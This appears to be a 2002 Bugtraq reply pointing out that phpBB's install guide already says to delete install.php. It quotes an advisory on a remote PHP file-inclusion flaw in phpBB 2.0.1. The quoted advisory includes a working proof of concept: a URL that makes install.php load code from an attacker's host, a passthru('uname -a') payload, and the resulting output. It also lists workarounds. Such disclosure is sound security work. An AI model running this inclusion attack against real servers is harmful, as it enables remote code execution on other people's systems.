Morris, The install instructions tells you to DELETE the install.php. :) Quoting the Installing instructions (INSTALL.html) "6. Important post-Install tasks for all installation methods Once you have succssfully installed phpBB 2.0.0 you MUST ensure you remove install.php, upgrade.php and update_to_FINAL.php files. Leaving these in place is a very serious potential security issue. Additionally you may delete the db/schemas, docs/ and contrib/ directories if you wish. With these files deleted you should proceed to the administration panel. Depending on how the installation completed you may have been directed there automatically. If not, login as the administrator you specified during install/upgrade and click the "Administration Panel" link at the bottom of any page. Ensure that details specified in General -> Configuration are correct!" Nathan. -----Original Message----- From: morris Chang [mailto:onlooker@cnun.xsdeny.net] Sent: Sunday, June 16, 2002 6:30 AM To: bugtraq@securityfocus.com Subject: malicious PHP source injection in phpBB JCC Security Advisory June 16, 2002 malicious PHP source injection in phpBB Description phpBB is one of popular PHP bulletin board systems. When allow_url_fopen = On and register_globals = On in php.ini, phpBB has vulnerability because install.php contains dangerous codes. So an attacker can include any files into server's PHP codes. Impact It's tested on phpBB 2.0.1. but I think all of phpBB 2 is affected. Workaround allow_url_fopen = off and register_globals = off. and if complete install remove or rename install.php. Or in install.php -------install.php------------ define('IN_PHPBB', true); $phpbb_root_path='./'; ---------------------------- Put it -------snip----------------- $phpbb_root_dir='./'; ---------------------------- Good idea to code that <<PHP_CODE ini_set("register_globals", "Off"); ini_set ("allow_url_fopen", "Off"); PHP_CODE Tested systems phpBB 2.0.1 Debian GNU/Linux SID(x86) Background We checked the vulnerability with "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE"; and made a sample code, functions_selects.php, --------------------includes/functions_selects.php-------------- <? passthru("uname -a"); ?> ----------------------------------------- and type the following URL to invoke this sample code. TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/"; -------out put---------------------------- Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182 Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183 Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/install.php on line 346 ----------------------------------------- thx for BlackKnight at r0ar --- http://jcc.hackerslab.org(at morris Chang) e-mail : morris@xsdeny.net
